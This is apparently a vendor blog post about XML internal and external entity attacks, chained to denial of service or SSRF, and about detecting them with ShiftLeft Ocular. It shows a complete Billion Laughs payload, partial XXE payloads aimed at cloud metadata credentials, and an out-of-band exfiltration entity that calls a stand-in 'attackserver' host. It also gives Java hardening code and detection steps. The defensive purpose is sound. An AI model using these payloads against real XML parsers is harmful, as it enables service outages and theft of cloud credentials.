Detecting Chained XXE (XML External Entity) to DOS (Denial of Service) or SSRF (Server Side Request Forgery) using ShiftLeft Ocular

A significant number of enterprises use XML as a data exchange format. XML is the de facto standard for exchanging messages between enterprise applications in a Service-Oriented Architecture. Messages that conform to the canonical model are converted to and from XML.

If you have ever worked in an enterprise context, you know that life there isn’t simple, and neither are the types of data and relationships you come across. This is an environment where XML shines as a data format, with an extensible schema to represent complex real-world business processes.

Many industry standards have evolved over the years that are based on XML. Years of work and expertise have gone into these standards. In particular, this is the case in finance (ESMA TRACE, MIFID, XBRL), retail, healthcare (HL7), life sciences (CDISC), and public sector (EU) just to name a few. In the publishing industry, XML is used throughout the document processing workflow. It is also the standard for Office file formats such as Word, Excel, PowerPoint or the Google Docs equivalents.

XIE (XML Internal Entity) Attack — LOL! based Denial Of Service

<!DOCTYPE biz [    
<!ENTITY dry "Don't Repeat Yourself" > <!-- definition -->
]><text>&dry;</text> <!-- usage -->

All we need to do is to write the doctype declaration and define the custom entity in it. After that, we can use our new internal entity in an XML document. As a result, the parser will replace every &dry; occurrence with ‘Don’t Repeat Yourself’ text. Unfortunately, this feature puts us in danger.
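
To see the substitution happen in a real parser, here is a minimal Java sketch that feeds the document above to the JDK's built-in DOM parser with default settings. The class and method names (InternalEntityDemo, expand) are illustrative assumptions, not part of the original article.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical demo class: shows internal entity expansion with a default parser.
class InternalEntityDemo {
    // Same document as above: one internal entity, referenced once.
    static final String XML =
        "<!DOCTYPE biz [\n"
      + "<!ENTITY dry \"Don't Repeat Yourself\">\n"
      + "]><text>&dry;</text>";

    // Parses the XML with default factory settings and returns the root element's text.
    static String expand(String xml) throws Exception {
        DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        Document doc = builder.parse(
            new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // The &dry; reference is replaced by the entity's value.
        System.out.println(expand(XML));
    }
}
```

Nothing was configured on the factory here, which is the point: entity expansion is on unless the application turns it off.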

Let’s look at the very simple, yet dangerous denial of service (DoS) attack called the Billion laughs attack.

In order to carry out the attack, you need to prepare malicious XML using internal entities and use it as an input.

<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lola "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lolb "&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;&lola;">
<!ENTITY lolc "&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;&lolb;">
<!ENTITY lold "&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;&lolc;">
<!ENTITY lole "&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;&lold;">
<!ENTITY lolf "&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;&lole;">
<!ENTITY lolg "&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;&lolf;">
<!ENTITY lolh "&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;&lolg;">
<!ENTITY loli "&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;&lolh;">
]>
<lolz>&loli;</lolz>

When an XML parser loads this document, it will try to resolve the loli entity. First, loli expands to ten lolh entities, each lolh expands to ten lolg entities, and so on down to lol. As a result, we get 1 billion “lol” strings.

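This places a heavy burden on the host's compute resources and can severely impede application responsiveness. A payload of under a kilobyte expands to roughly 3 GB of text (one billion copies of a three-character string), and memory consumption on that scale can crash the process or, in the worst case, take down the host.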
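
The size of the expansion follows directly from the fan-out (ten references per entity) and the nesting depth (nine entities, lola through loli). The short Java sketch below works through that arithmetic; the class and method names are hypothetical, and it assumes one byte per character.

```java
// Hypothetical helper: computes how large a nested-entity payload becomes.
class BillionLaughsMath {
    // Copies of the base string after `levels` nested entities,
    // each of which references the previous entity `fanOut` times.
    static long expandedCopies(int fanOut, int levels) {
        long copies = 1;
        for (int i = 0; i < levels; i++) {
            copies = Math.multiplyExact(copies, fanOut); // throws on overflow
        }
        return copies;
    }

    public static void main(String[] args) {
        long copies = expandedCopies(10, 9);   // lola .. loli = 9 levels
        long bytes = copies * "lol".length();  // 3 bytes per copy (ASCII assumed)
        // prints "1000000000 copies, 3000000000 bytes"
        System.out.println(copies + " copies, " + bytes + " bytes");
    }
}
```

Adding one more level multiplies the result by ten again, which is why a parser-side limit matters more than any limit on input size.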

XXE (XML External Entity) Attack chained to SSRF (Server Side Request Forgery)— Metadata exfiltration

<!DOCTYPE xxe [
<!ENTITY externalEntity SYSTEM "ADD URI HERE">
]>

Let’s use an example to illustrate this. Imagine that we have two endpoints:

1. One for listing all posts
2. One for creating new posts

With this in mind, we can prepare malicious XML input and use the endpoint to create a new post. The input data could look like this:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY externalEntity SYSTEM

In a subsequent iteration, we can use another endpoint to list all posts. If the attack succeeds, the response will look like this:


By appending the role name (received in the response to the previous request) to the metadata URI, the attacker can retrieve the access key, secret key, and session token issued by the hosting cloud provider.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY externalEntity SYSTEM

If the attack succeeds, the response will look like this:

"Code" : "Success",
"LastUpdated" : "2018-01-25T23:15:40Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKJBD787XXXXXXXX",
"SecretAccessKey" : "XXXXXXXXXXX",
"Token" : "ZXXXXXXXXXX",
"Expiration" : "2018-01-26T05:40:31Z"

As you can see, this is really dangerous and can lead to serious security problems!

What if there is only an API to create and not list information? This would impede an attacker from receiving feedback or a response reflectively.

You might think you are safe, but that’s not true. Instead of relying on a reflected response, the attacker can register an endpoint that listens for every request and logs the results.

<!ENTITY % paramEntityDefiningExternalEntity '<!ENTITY sniffTraffic SYSTEM "http://attackserver/sniff_log?%result;">'>

<!DOCTYPE xxe [
<!ENTITY % paramEntity SYSTEM "URI to file with parameter entity definitions" >
]>
<post author="consumer" topic="XXE" content="&sniffTraffic;" />

Safe Coding to prevent XXE Chaining

The precautionary measures take into account different versions of the JDK runtime by setting features that collectively prevent an XXE/XIE attack across disparate versions and runtimes.
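
As a rough illustration of what such measures can look like, the sketch below hardens a DocumentBuilderFactory using feature names that are widely recommended for the JDK's bundled Xerces-based parser. It is an assumption about a reasonable configuration, not the exact listing this article relies on, and the class and method names are hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical helper: builds a DOM factory with DTDs and external entities disabled.
class HardenedXmlFactory {
    static DocumentBuilderFactory newHardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any DOCTYPE outright; this blocks both XIE and XXE payloads.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth, in case DOCTYPE ever has to be allowed again.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Returns true if the hardened parser refuses the given document.
    static boolean rejects(String xml) throws Exception {
        try {
            newHardenedFactory().newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        String payload = "<!DOCTYPE lolz [<!ENTITY lol \"lol\">]><lolz>&lol;</lolz>";
        System.out.println("payload rejected: " + rejects(payload));
        System.out.println("plain XML rejected: " + rejects("<post/>"));
    }
}
```

Setting several overlapping features is deliberate: a parser implementation that does not honor one of them may still honor another, and setFeature throws ParserConfigurationException when a feature is unsupported, so a gap surfaces at startup rather than silently.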

Can these safe coding checks be verified using Ocular?

  1. Identify the untrusted, attacker-controlled vector content, in this case
  2. Mark DocumentBuilderFactory.newInstance() as a source in the data flow
  3. Mark builder.parse(new ByteArrayInputStream(content.getBytes())) as sink
  4. Run a reachability analysis between the source and the sink for flows influenced by the attacker-controlled vector
  5. Verify, using Ocular’s passes construct, that all safety features are enabled (as prescribed above) in the data flow that originates at the source, before the attacker-controlled vector reaches the sensitive sink.
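
For orientation, the source and sink named in steps 2 and 3 could appear together in a handler shaped like the Java sketch below. This is a hypothetical example written for illustration (the PostParser class and parsePost method are assumptions), not the POC codebase itself.

```java
import java.io.ByteArrayInputStream;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical vulnerable handler: `content` is the attacker-controlled request body.
class PostParser {
    static Document parsePost(String content) throws Exception {
        // Source (step 2): a factory created with default, permissive settings.
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // No safety features are set between the source and the sink.
        DocumentBuilder builder = factory.newDocumentBuilder();
        // Sink (step 3): attacker-controlled bytes reach the parser.
        return builder.parse(new ByteArrayInputStream(content.getBytes()));
    }

    public static void main(String[] args) throws Exception {
        Document doc = parsePost("<post author=\"consumer\" topic=\"XXE\"/>");
        System.out.println(doc.getDocumentElement().getTagName());
    }
}
```

A flow like this is what step 5 is meant to flag: the path from newInstance() to parse() never passes through a call that enables the protective features.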

ShiftLeft’s Ocular is an application security platform built over the foundational Code Property Graph that is uniquely positioned to deliver a specification model to query for vulnerable conditions, business logic flaws and insider attacks that might exist in your application’s codebase.

The following POC codebase is evaluated for this seeded condition.

Specified below is a detailed investigation log to detect XXE chaining to DOS (LOL based) or SSRF. Criteria for validation can also be evaluated to ensure that the conclusion is a true positive.

If you’d like to learn more about ShiftLeft’s Code Property Graph and Ocular, and how they can be used to help identify XXE+SSRF or XXE+DOS, please request a demo.

Happy Hunting and Hacking!

Engineer, InfoSec tinkerer, Seed Investor, Founder/CTO of ShiftLeft Inc., (Opinions, my own)
